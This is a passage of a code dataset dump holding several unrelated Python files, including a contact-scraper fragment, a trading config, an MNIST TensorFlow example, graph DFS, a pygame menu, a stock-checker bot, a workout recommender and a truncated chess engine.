p:nth-child(1)\").text]\n\t\t\t\tself.save_csv(items)\n\t\t\texcept:\n\t\t\t\tprint('error: ', url)\n\t\t\tbrowser.close()\n\n\tdef make_phone_format(self):\n\t\tself.phone = self.phone.replace(' ', '').replace('-', '').replace('(', '').replace(')', '') \n\t\n\t\tif len(self.phone) != 13:\n\t\t\tself.phone = '+380' + self.phone[-9:]\n\t\tif self.phone[2] == '0' and self.phone[3] == '0':\n\t\t\tself.phone = '+' + self.phone[:3] + self.phone[4:]\n\n\tdef save_csv(self, items):\n\t\twith open(f'{self.search_words}.csv', 'a', encoding=\"utf-8\") as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerow((items['name'],\n\t\t\t\t\t\t\t items['phone'],\n\t\t\t\t\t\t\t items['city'] \n\t\t\t\t\t\t))\n\n\n\nif __name__ == '__main__':\n\tsearch_words = input('Что будем искать?:\\n') #нужно ввести то что ищем\n\t#Search(search_words)\n\tMain(search_words)\n\t","sub_path":"kab/search_words.py","file_name":"search_words.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"113061789","text":"import datetime\n\n\nTRAIN_MODELS = True\ndb_ds = 'data/bitfinex_data.h5'\ndb_path = 'data/bout.h5'\n\n\n# Training Parameters\nfeature_size = 2\nstart_date_train = datetime.datetime(2018, 10, 28)\nend_date_train = datetime.datetime(2018, 11, 8)\ntrain_test_ratio = .85\npredictor_mode = 'DashGRU'\nensemble_learning = False\nensemble_learning_modes = ['ActGRU', 'TWSTDGRU', 'TWSTD2GRU', 'DashGRU', 'DashLSTMGRU', ]\nstride = 1\n\n\n# Trading Parameters\nsequential_trading = True\nsequential_trading_iterations = 5\nstart_date_sequential_trading = datetime.datetime(2018, 1, 20)\nwallets = 100\n\nbad_coins = [\n # 'BTCUSD',\n # 'DSHUSD',\n # 'ETHUSD',\n # 'EOSUSD',\n # 'ETCUSD',\n # 'ETHUSD',\n # 'IOTUSD',\n # 'NEOUSD',\n # 'LTCUSD',\n # 'XLMUSD',\n # 'XMRUSD',\n # 'XRPUSD',\n # 'TRXUSD',\n # 'ZECUSD',\n]\n\nmax_in_portfolio = 1\nstop_loss_ratio = 0.004\n\n\nsubplot_in_row = 1\nsubplot_in_col = 
1\n\n\n# Exchange Simulation Parameters\nfee = 0.002\nstart_date_test = datetime.datetime(2018, 11, 8)\nend_date_test = datetime.datetime.now() # datetime.datetime(2018, 4, 16)\nmax_size_of_trade_set = 288 # np.inf\n\n","sub_path":"standard/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"177782039","text":"import tensorflow as tf\n#import input_data\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport matplotlib.pyplot as plt\nfrom random import randint\nimport numpy as np\n\nlogs_path = 'log_mnist_softmax'\n\nbatch_size = 100\nlearning_rate = 0.5\ntraining_epochs = 3\nmnist = input_data.read_data_sets(\"data\", one_hot=True)\n#X = tf.placeholder(tf.float32, [None, 28, 28, 1],name=\"input\")\nX = tf.placeholder(tf.float32, [None, 784],name=\"input\")\nY_ = tf.placeholder(tf.float32, [None, 10])\n\nW = tf.Variable(tf.zeros([784, 10]))\nb = tf.Variable(tf.zeros([10]))\nXX = tf.reshape(X, [-1, 784])\n\nY = tf.nn.softmax(tf.matmul(XX, W) + b,name=\"output\")\ncross_entropy = -tf.reduce_mean(Y_ * tf.log(Y)) * 1000.0\ncorrect_prediction = tf.equal(tf.argmax(Y, 1), tf.argmax(Y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\ntrain_step = tf.train.GradientDescentOptimizer(0.005).minimize(cross_entropy)\ntf.summary.scalar(\"cost\", cross_entropy)\ntf.summary.scalar(\"accuracy\", accuracy)\nsummary_op = tf.summary.merge_all()\n\n\nsaver = tf.train.Saver()\n\nwith tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n\n for epoch in range(training_epochs):\n batch_count = int(mnist.train.num_examples/batch_size)\n for i in range(batch_count):\n batch_x, batch_y = mnist.train.next_batch(batch_size)\n sess.run([train_step],feed_dict={X: batch_x, Y_: batch_y})\n print(\"Epoch: \", epoch)\n print(\"Accuracy: \", accuracy.eval\\\n (feed_dict={X: mnist.test.images,\\\n Y_: 
mnist.test.labels}))\n\n print(\"done\")\n\n writer = tf.summary.FileWriter(logs_path, graph=tf.get_default_graph())\n writer.close()\n num = randint(0, mnist.test.images.shape[0])\n img = mnist.test.images[num]\n classification = sess.run(tf.argmax(Y, 1),\\\n feed_dict={X: [img]})\n print('Neural Network predicted', classification[0])\n print('Real label is:', np.argmax(mnist.test.labels[num]))\n save_path = saver.save(sess, \"./saved_mnist_cnn.ckpt\")\n print(\"Model saved to %s\" % save_path)\n","sub_path":"Modules/Module-4/code/extra-code/example-1.py","file_name":"example-1.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"648907211","text":"def dfs(vertex, graph, visited:set):\n \"\"\"Осуществляет поиск в глубину по графу graph начиная с вершины vertex.\n\n graph - словарь вида {вершина: {соседи} - множество}\n \"\"\"\n\n visited.add(vertex)\n\n\n for neighbour in graph[vertex]:\n if neighbour not in visited:\n dfs(neighbour, graph, visited)\n\ndef сount_connected_component(graph:dict):\n \"\"\"Осуществляет подсчет компенент связности графа\"\"\"\n \n visited = set()\n count = 0\n\n for vertex in graph:\n if vertex not in visited:\n dfs(vertex, graph, visited)\n count += 1\n \n return count\n \n \n\n \n","sub_path":"algo_and_ds/deep_first_search.py","file_name":"deep_first_search.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"454078514","text":"import pygame\nfrom screens import util\n\n\ndef main(screen, clock):\n bg = util.get_image('background')\n bg_h = 934\n logo = util.get_image('logo')\n start = util.get_image('start_button')\n start = pygame.transform.scale(start, (350, 150))\n option = util.get_image('options_button')\n option = pygame.transform.scale(option, (400, 150))\n\n bg_animation_ticks = 200\n bg_ease = util.EaseOutSine(bg_animation_ticks, 
util.HEIGHT - bg_h, 0)\n logo_ease = util.EaseOutSine(bg_animation_ticks, -50, -160)\n\n for i in range(bg_animation_ticks):\n # Initialize & scroll start screen\n screen.fill([0, 255, 0])\n screen.blit(bg, (0, next(bg_ease)))\n screen.blit(logo, (0, next(logo_ease)))\n\n if not util.tick(clock):\n return False\n\n for i in range(0, 200):\n start.set_alpha(i/20) # doesn't make the image fully opaque\n option.set_alpha(i/20)\n screen.blit(start, (450, 350))\n screen.blit(option, (420, 500))\n if not util.tick(clock):\n return False\n\n while True:\n mouse = pygame.mouse.get_pos()\n click = pygame.mouse.get_pressed()\n x = 450\n y = 350\n w = 350\n h = 150\n if x+w > mouse[0] > x and y+h > mouse[1] > y:\n if click[0] == 1:\n return True\n if not util.tick(clock):\n return False\n","sub_path":"screens/start_screen.py","file_name":"start_screen.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"304975373","text":"class Solution:\n @staticmethod\n def two_sum(_nums: list, _target: int) -> list:\n indices = list()\n for ind_x, num_x in enumerate(_nums):\n for ind_y, num_y in enumerate(_nums):\n if ind_x == ind_y:\n continue\n elif num_x + num_y == _target:\n indices.append(num_x)\n indices.append(num_y)\n return indices\n\n\n_nums = [2, 7, 11, 15]\n_target = 9\n_s = Solution()\n_s.two_sum(_nums, _target)\n","sub_path":"problems_solved/01_two-sum.py","file_name":"01_two-sum.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"402430047","text":"# -*- coding: UTF-8 -*-\ndict = {}\nwith open(\"data.txt\", \"r\", encoding=\"utf-8\") as f:\n for line in f.readlines():\n line = line.strip('\\n')\n # 每一行以双空格作为定界符进行拆分\n list = line.split(sep=\" \")\n for item in list:\n if (dict.__contains__(item)):\n dict[item] += 1;\n else:\n dict.setdefault(item, 1)\n # print(line)\nwith 
open(\"dict.txt\", \"w\", encoding=\"utf-8\") as f:\n for word in dict.keys():\n list = word.split(sep=\"/\")\n print(list)\n if (len(list) > 1):\n s = list[0] + ' ' + str(dict[word]) + ' ' + list[1] + '\\n'\n f.write(s)\n","sub_path":"NLP/homework1/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"427342956","text":"from .models import Info\nfrom copy import deepcopy, copy\nfrom sys import maxsize\nfrom math import ceil\nfrom workout.models import Workout, Exercise\n\n# Height in cm\n# Weight in Kg\n# FatPrc in %\n# Muscle sizes {'neck':0,\n# 'rshoulder':0,\n# 'lshoulder': 0,\n# 'rbicep':0,\n# 'lbicep': 0,\n# 'rtricep':0,\n# 'ltricep':0,\n# 'rforearm':0,\n# 'lforearm':0,\n# 'abs':0,\n# 'roblique':0,\n# 'loblique': 0,\n# 'chest':0,\n# 'upper back':0,\n# 'traps':0,\n# 'lower back':0,\n# 'rglute':0,\n# 'lglute': 0,\n# 'rhams':0,\n# 'lhams': 0,\n# 'rquadriceps':0,\n# 'lquadriceps': 0,\n# 'rcalves':0,\n# 'lcalves':0\n# }\n\ndef getNewSizes(before_muscle_sizes, muscle_sizes, muscle_weights, excercise):\n max_muscle_size = max(muscle_sizes.values())\n ex_weights = excercise.getWeights()\n for muscle in ex_weights.keys():\n #print(\"ex weights[\" + muscle + \"] = \" + str(ex_weights[muscle]))\n #print(type(ex_weights[muscle]))\n #print(excercise.getData()['name'])\n #print(\"muscle weights[\" + muscle + \"] = \" + str(muscle_weights[muscle]))\n #print(type(muscle_weights[muscle]))\n #print(\"max muscle size:\" + str(max_muscle_size))\n #print(type(max_muscle_size))\n before_muscle_sizes[muscle] += float(ex_weights[muscle])*max_muscle_size#*muscle_weights[muscle]\n return before_muscle_sizes\n\ndef getScore(before_muscle_sizes, after_muscle_sizes):\n totalScore = 0\n for muscle in before_muscle_sizes.keys():\n if before_muscle_sizes[muscle] > after_muscle_sizes[muscle]:\n totalScore += (before_muscle_sizes[muscle]-after_muscle_sizes[muscle])\n 
else:\n totalScore += 2*(after_muscle_sizes[muscle]-before_muscle_sizes[muscle])\n return totalScore\n\ndef getTimeInWeeks(max_size):\n max_size += 1\n return -0.0000552399*(max_size**2)+0.0131629*max_size+1\n\ndef getExcerciseList(init_muscle_sizes, muscle_sizes, muscle_weights):\n all_exercises = list(deepcopy(Exercise.objects.all()))\n print(all_exercises)\n minscore = maxsize\n min_ex = all_exercises[0]\n got_new_score = True\n final_excercises = []\n ccount = 0\n while got_new_score:\n ccount += 1\n got_new_score = False\n for ex in all_exercises:\n newscore = getScore(getNewSizes(deepcopy(init_muscle_sizes), muscle_sizes, muscle_weights, ex), muscle_sizes)\n if newscore < minscore:\n got_new_score = True\n min_ex = copy(ex)\n minscore = newscore\n if got_new_score:\n final_excercises.append(deepcopy(min_ex))\n getNewSizes(init_muscle_sizes, muscle_sizes, muscle_weights, min_ex)\n all_exercises.pop(all_exercises.index(min_ex))\n return final_excercises\n\ndef getWorkout(height, weight, fatprc, gweight, gfatprc, days, muscle_sizes):\n\n #all_exercises = Exercise.objects.all()\n max_muscle_size = max(muscle_sizes.values())\n if max_muscle_size == 0:\n pass\n # tühi workout!! 
ja ainult weightloss/rasvaprotsendi värk\n normative_time_weeks = getTimeInWeeks(max_muscle_size)\n normative_time_days = int(ceil(normative_time_weeks*3))\n\n muscle_weights = {m:0 for m in muscle_sizes.keys()}\n init_muscle_sizes = deepcopy(muscle_weights)\n if max_muscle_size != 0:\n for m in muscle_sizes.keys():\n muscle_weights[m] = muscle_sizes[m]/max_muscle_size\n\n \"\"\"\n minscore = maxsize\n min_ex = all_exercises[0]\n improvement_possible = True\n final_excercises = []\n while improvement_possible:\n for ex in all_exercises:\n newscore = getScore(getNewSizes(deepcopy(init_muscle_sizes), muscle_weights, ex),muscle_sizes)\n if newscore < minscore:\n min_ex = ex\n minscore = newscore\n if minscore == maxsize:\n improvement_possible = False\n else:\n minscore = maxsize\n final_excercises.append(min_ex)\n getNewSizes(init_muscle_sizes, muscle_weights, ex)\n all_exercises.pop(min_ex)\n\n #final_excercises done\"\"\"\n excercises = getExcerciseList(init_muscle_sizes, muscle_sizes, muscle_weights)\n \"\"\"\n for k in init_muscle_sizes:\n print(k + str(init_muscle_sizes[k]))\n for e in excercises:\n print(e.getData()['name'])\n \"\"\"\n return excercises\n\n\n\n","sub_path":"SCULPTR/andmeSisestus/algorithm.py","file_name":"algorithm.py","file_ext":"py","file_size_in_byte":4418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"21771234","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Aug 5 16:40:22 2017\r\nthreaded camera test for ePuckVRep\r\nmake sure to start first VRep scene ePuckBasicS5.ttt, then cameraViewer.py\r\n\r\n\r\n@author: hans vollbrecht\r\n\"\"\"\r\nimport time\r\nfrom ePuckVRep import EPuckVRep\r\nfrom threading import Thread, Lock\r\n\r\nimport numpy as np\r\nfrom PIL import Image as I\r\n\r\n\r\n\r\nclass CameraTest(Thread):\r\n def __init__(self, resolX, resolY):\r\n \"\"\"\r\n :param\r\n \"\"\"\r\n Thread.__init__(self)\r\n\r\n # behavior matrices for numPy version\r\n 
self.avoidFrontCollisionMatrix = np.asarray([[1, 2, 0, 0],\r\n [-1, -2, 0, 0]])\r\n\r\n self.keepToWallAtLeftMatrix = np.asarray([[-1, 0],\r\n [0, 0]])\r\n self.keepToWallAtRightMatrix = np.asarray([[0, 0],\r\n [0, -1]])\r\n self.image = I.new(\"RGB\", (resolX, resolY), \"white\")\r\n self._imageLock = Lock()\r\n\r\n def normalizeDistances(self, distances, noDetectionDistance):\r\n \"\"\"\r\n ePuck has higher proximity values for lower distances; also normalize to [0,1]\r\n :param distances: numpy float array\r\n distances measured by proximity sensors; in meters\r\n :param noDetectionDistance: float\r\n maximum distance in meters, same property for all proximity sensors: 0.05 for ePuck\r\n :return: distances: numpy float array\r\n normalized distances measured by proximity sensors\r\n \"\"\"\r\n distances = 1 - (distances / noDetectionDistance)\r\n return distances\r\n\r\n\r\n def calculateMotorValues(self, distances, noDetectionDistance):\r\n \"\"\"\r\n :param distances: numpy float array\r\n distances measured by proximity sensors; in meters\r\n starts with index 0: far left, in clockwise sequence\r\n :param noDetectionDistance: float\r\n maximum distance in meters, same property for all proximity sensors: 0.05 for ePuck\r\n :return: (float,float)\r\n left and right motor velocity\r\n \"\"\"\r\n\r\n maxVel = 120 * np.pi / 180 # 4/3 of a full wheel turn\r\n\r\n velRight = maxVel\r\n velLeft = maxVel\r\n\r\n if all(np.isclose(distances[1:5], noDetectionDistance * np.ones(4))):\r\n # Nothing in front. 
Maybe we have an obstacle on the side, in which case we want to keep a constant distance with it:\r\n if distances[0] > 0.25 * noDetectionDistance:\r\n [velLeft, velRight] = [velLeft, velRight] + maxVel * \\\r\n self.keepToWallAtLeftMatrix.dot(\r\n self.normalizeDistances(distances[0:2], noDetectionDistance))\r\n\r\n elif distances[5] > 0.25 * noDetectionDistance:\r\n [velLeft, velRight] = [velLeft, velRight] + maxVel * \\\r\n self.keepToWallAtRightMatrix.dot(\r\n self.normalizeDistances(distances[4:6], noDetectionDistance))\r\n\r\n else:\r\n # Obstacle in front\r\n [velLeft, velRight] = [velLeft, velRight] + maxVel * \\\r\n self.avoidFrontCollisionMatrix.dot(\r\n self.normalizeDistances(distances[1:5], noDetectionDistance))\r\n\r\n return velLeft, velRight\r\n\r\n\r\n def getImage(self):\r\n self._imageLock.acquire()\r\n im = self.image\r\n self._imageLock.release()\r\n return im\r\n\r\n def update(self, source, image):\r\n self._imageLock.acquire()\r\n self.image = image\r\n self._imageLock.release()\r\n\r\n def run(self):\r\n robot = EPuckVRep('ePuck', port=19999, synchronous=False)\r\n\r\n robot.enableAllSensors()\r\n robot.enableCamera()\r\n robot.setSensesAllTogether(True)\r\n robot.createImageThread(cameraCycleTime=0.5)\r\n robot.addImageObserver(self)\r\n noDetectionDistance = 0.05 * robot.getS()\r\n\r\n # main sense-act cycle\r\n while robot.isConnected():\r\n\r\n robot.fastSensingOverSignal()\r\n\r\n distVector = robot.getProximitySensorValues()\r\n\r\n #leftMotor, rightMotor = self.calculateMotorValues(distVector, noDetectionDistance)\r\n leftMotor = 0.5\r\n rightMotor = -0.5\r\n robot.setMotorSpeeds(leftMotor, rightMotor)\r\n\r\n time.sleep(0.05)\r\n\r\n robot.disconnect()\r\n\r\n\r\n","sub_path":"imageTakeVrepThreaded.py","file_name":"imageTakeVrepThreaded.py","file_ext":"py","file_size_in_byte":4617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"23932238","text":"from websites import 
content\nfrom session import client\nfrom bs4 import BeautifulSoup\nimport bot\n\ninfo = content['amazon.com']\nurl = info['url']\ntimeout = info['timeout']\n\nasync def run():\n res = client.get(url)\n print(res)\n soup = BeautifulSoup(res.text, 'lxml')\n sub_class=soup.find(id='availability') #finding that particular div \n print('amazon.com -> ')\n if sub_class: #above result can be none so checking if result is not none\n text = sub_class.find(\"span\", {\"class\": \"a-size-medium\"}).text.strip()\n print(\"availability : {}\".format(text)) \n msg = \"\"\n stock = False\n if (text == 'In Stock.'):\n msg = \"HOSTIAAAAA 😲 Que la PS5 esta en stock! 🔥\\n%s\\nMensaje: %s\" % (url, text)\n stock = True\n elif (text == 'Only 1 left in stock - order soon.'):\n msg = \"CORREEEEE 😲 Que solo queda UNA PS5 en stock! 🔥\\n%s\\nMensaje: %s\" % (url, text)\n stock = True\n else:\n msg = \"F... La PS5 no esta en stock 😢\\n%s\\nMensaje: %s\" % (url, text)\n stock = True\n if (stock): bot.send(msg)","sub_path":"scrapers/amazon_com.py","file_name":"amazon_com.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"428760132","text":"#!/usr/bin/env pypy\n# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nimport sys\nimport json\nimport math\nimport copy\nfrom itertools import count\nfrom collections import Counter, OrderedDict, namedtuple\n\n\n# Our board is represented as a 120 character string. 
The padding allows for\n# fast detection of moves that don't stay within the board.\nA1, H1, A8, H8 = 91, 98, 21, 28\ninitial = (\n ' \\n' # 0 - 9\n ' \\n' # 10 - 19\n ' rnbqkbnr\\n' # 20 - 29\n ' pppppppp\\n' # 30 - 39\n ' ........\\n' # 40 - 49\n ' ........\\n' # 50 - 59\n ' ........\\n' # 60 - 69\n ' ........\\n' # 70 - 79\n ' PPPPPPPP\\n' # 80 - 89\n ' RNBQKBNR\\n' # 90 - 99\n ' \\n' # 100 -109\n ' ' # 110 -119\n)\n\n###############################################################################\n# Move and evaluation tables\n###############################################################################\n\nN, E, S, W = -10, 1, 10, -1\ndirections = {\n 'P': (N, 2*N, N+W, N+E),\n 'N': (2*N+E, N+2*E, S+2*E, 2*S+E, 2*S+W, S+2*W, N+2*W, 2*N+W),\n 'B': (N+E, S+E, S+W, N+W),\n 'R': (N, E, S, W),\n 'Q': (N, E, S, W, N+E, S+E, S+W, N+W),\n 'K': (N, E, S, W, N+E, S+E, S+W, N+W)\n}\n\npst = {\n 'P': (0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 198, 198, 198, 198, 198, 198, 198, 198, 0,\n 0, 178, 198, 198, 198, 198, 198, 198, 178, 0,\n 0, 178, 198, 198, 198, 198, 198, 198, 178, 0,\n 0, 178, 198, 208, 218, 218, 208, 198, 178, 0,\n 0, 178, 198, 218, 238, 238, 218, 198, 178, 0,\n 0, 178, 198, 208, 218, 218, 208, 198, 178, 0,\n 0, 178, 198, 198, 198, 198, 198, 198, 178, 0,\n 0, 198, 198, 198, 198, 198, 198, 198, 198, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),\n 'B': (\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 797, 824, 817, 808, 808, 817, 824, 797, 0,\n 0, 814, 841, 834, 825, 825, 834, 841, 814, 0,\n 0, 818, 845, 838, 829, 829, 838, 845, 818, 0,\n 0, 824, 851, 844, 835, 835, 844, 851, 824, 0,\n 0, 827, 854, 847, 838, 838, 847, 854, 827, 0,\n 0, 826, 853, 846, 837, 837, 846, 853, 826, 0,\n 0, 817, 844, 837, 828, 828, 837, 844, 817, 0,\n 0, 792, 819, 812, 803, 803, 812, 819, 792, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),\n 'N': (0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 
0, 0, 0, 0,\n 0, 627, 762, 786, 798, 798, 786, 762, 627, 0,\n 0, 763, 798, 822, 834, 834, 822, 798, 763, 0,\n 0, 817, 852, 876, 888, 888, 876, 852, 817, 0,\n 0, 797, 832, 856, 868, 868, 856, 832, 797, 0,\n 0, 799, 834, 858, 870, 870, 858, 834, 799, 0,\n 0, 758, 793, 817, 829, 829, 817, 793, 758, 0,\n 0, 739, 774, 798, 810, 810, 798, 774, 739, 0,\n 0, 683, 718, 742, 754, 754, 742, 718, 683, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),\n 'R': (0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 1258, 1263, 1268, 1272, 1272, 1268, 1263, 1258, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),\n 'Q': (0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 2529, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0),\n 'K': (0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 60098, 60132, 60073, 60025, 60025, 60073, 60132, 60098, 0,\n 0, 60119, 60153, 60094, 60046, 60046, 60094, 60153, 60119, 0,\n 0, 60146, 60180, 60121, 60073, 60073, 60121, 60180, 60146, 0,\n 0, 60173, 60207, 60148, 60100, 60100, 60148, 60207, 60173, 0,\n 0, 60196, 60230, 60171, 60123, 60123, 60171, 
60230, 60196, 0,\n 0, 60224, 60258, 60199, 60151, 60151, 60199, 60258, 60224, 0,\n 0, 60287, 60321, 60262, 60214, 60214, 60262, 60321, 60287, 0,\n 0, 60298, 60332, 60273, 60225, 60225, 60273, 60332, 60298, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,\n 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)\n}\n\n\n###############################################################################\n# Chess logic\n###############################################################################\n\nclass Position(namedtuple('Position', 'board score wc bc ep kp')):\n \"\"\" A state of a chess game\n board -- a 120 char representation of the board\n score -- the board evaluation\n wc -- the castling rights\n bc -- the opponent castling rights\n ep - the en passant square\n kp - the king passant square\n \"\"\"\n\n def genMoves(self):\n # For each of our pieces, iterate through each possible 'ray' of moves,\n # as defined in the 'directions' map. The rays are broken e.g. by\n # captures or immediately in case of pieces such as knights.\n for i, p in enumerate(self.board):\n if not p.isupper(): continue\n for d in directions[p]:\n for j in count(i+d, d):\n q = self.board[j]\n # Stay inside the board\n if self.board[j].isspace(): break\n # Castling\n if i == A1 and q == 'K' and self.wc[0]: yield (j, j-2)\n if i == H1 and q == 'K' and self.wc[1]: yield (j, j+2)\n # No friendly captures\n if q.isupper(): break\n # Special pawn stuff\n if p == 'P' and d in (N+W, N+E) and q == '.' 
and j not in (self.ep, self.kp): break\n if p == 'P' and d in (N, 2*N) and q != '.': break\n if p == 'P' and d == 2*N and (i < A1+N or self.board[i+N] != '.'): break\n # Move it\n yield (i, j)\n # Stop crawlers from sliding\n if p in ('P', 'N', 'K'): break\n # No sliding after captures\n if q.islower(): break\n\n def rotate(self):\n return Position(\n self.board[::-1].swapcase(), -self.score,\n self.bc, self.wc, 119-self.ep, 119-self.kp)\n\n def move(self, move):\n i, j = move\n p, q = self.board[i], self.board[j]\n put = lambda board, i, p: board[:i] + p + board[i+1:]\n # Copy variables and reset ep and kp\n board = self.board\n wc, bc, ep, kp = self.wc, self.bc, 0, 0\n score = self.score + self.value(move)\n # Actual move\n board = put(board, j, board[i])\n board = put(board, i, '.')\n # Castling rights\n if i == A1: wc = (False, wc[1])\n if i == H1: wc = (wc[0], False)\n if j == A8: bc = (bc[0], False)\n if j == H8: bc = (False, bc[1])\n # Castling\n if p == 'K':\n wc = (False, False)\n if abs(j-i) == 2:\n kp = (i+j)//2\n board = put(board, A1 if j < i else H1, '.')\n board = put(board, kp, 'R')\n # Special pawn stuff\n if p == 'P':\n if A8 <= j <= H8:\n board = put(board, j, 'Q')\n if j - i == 2*N:\n ep = i + N\n if j - i in (N+W, N+E) and q == '.':\n board = put(board, j+S, '.')\n # We rotate the returned position, so it's ready for the next player\n return Position(board, score, wc, bc, ep, kp).rotate()\n\n def value(self, move):\n i, j = move\n p, q = self.board[i], self.board[j]\n # Actual move\n score = pst[p][j] - pst[p][i]\n # Capture\n if q.islower():\n score += pst[q.upper()][j]\n # Castling check detection\n if abs(j-self.kp) < 2:\n score += pst['K'][j]\n # Castling\n if p == 'K' and abs(i-j) == 2:\n score += pst['R'][(i+j)//2]\n score -= pst['R'][A1 if j < i else H1]\n # Special pawn stuff\n if p == 'P':\n if A8 <= j <= H8:\n score += pst['Q'][j] - pst['P'][j]\n if j == self.ep:\n score += pst['P'][j+S]\n return 
score\n\n\n\n\n\n\n###############################################################################\n# User interface\n###############################################################################\n\n# Python 2 compatability\nif sys.version_info[0] == 2:\n input = raw_input\n\n\ndef parse(c):\n fil, rank = ord(c[0]) - ord('a'), int(c[1]) - 1\n return A1 + fil - 10*rank\n\n\ndef render(i):\n rank, fil = divmod(i - A1, 10)\n return chr(fil + ord('a')) + str(-rank + 1)\n\n#changing the user move to accomodate for the board flipping\ndef moveSwitch(crdn):\n rdn = []\n if crdn[0] == 'a':\n rdn.append('h')\n elif crdn[0] == 'b':\n rdn.append('g')\n elif crdn[0] == 'c':\n rdn.append('f')\n elif crdn[0] == 'd':\n rdn.append('e')\n elif crdn[0] == 'h':\n rdn.append('a')\n elif crdn[0] == 'g':\n rdn.append('b')\n elif crdn[0] == 'f':\n rdn.append('c')\n elif crdn[0] == 'e':\n rdn.append('d')\n\n if crdn[1] == '1':\n rdn.append('8')\n elif crdn[1] == '2':\n rdn.append('7')\n elif crdn[1] == '3':\n rdn.append('6')\n elif crdn[1] == '4':\n rdn.append('5')\n elif crdn[1] == '5':\n rdn.append('4')\n elif crdn[1] == '6':\n rdn.append('3')\n elif crdn[1] == '7':\n rdn.append('2')\n elif crdn[1] == '8':\n rdn.append('1')\n\n return rdn\n\n#Creating two lists that contain the three-part tuples of the pieces for the JSON\ndef searchBoard(board):\n #tuples for the white team\n teamWhite = []\n #tuples for the black team\n teamBlack = []\n #variable to determine if a king has been killed\n kings = 0\n #starting spot where the pieces are stored in the sting of the board\n start = 21\n #goes through the entire board\n while start < 99:\n #will store a single piece tuple\n temp = []\n #if the spot on the board does not contain a piece\n if board[start] == '.' 
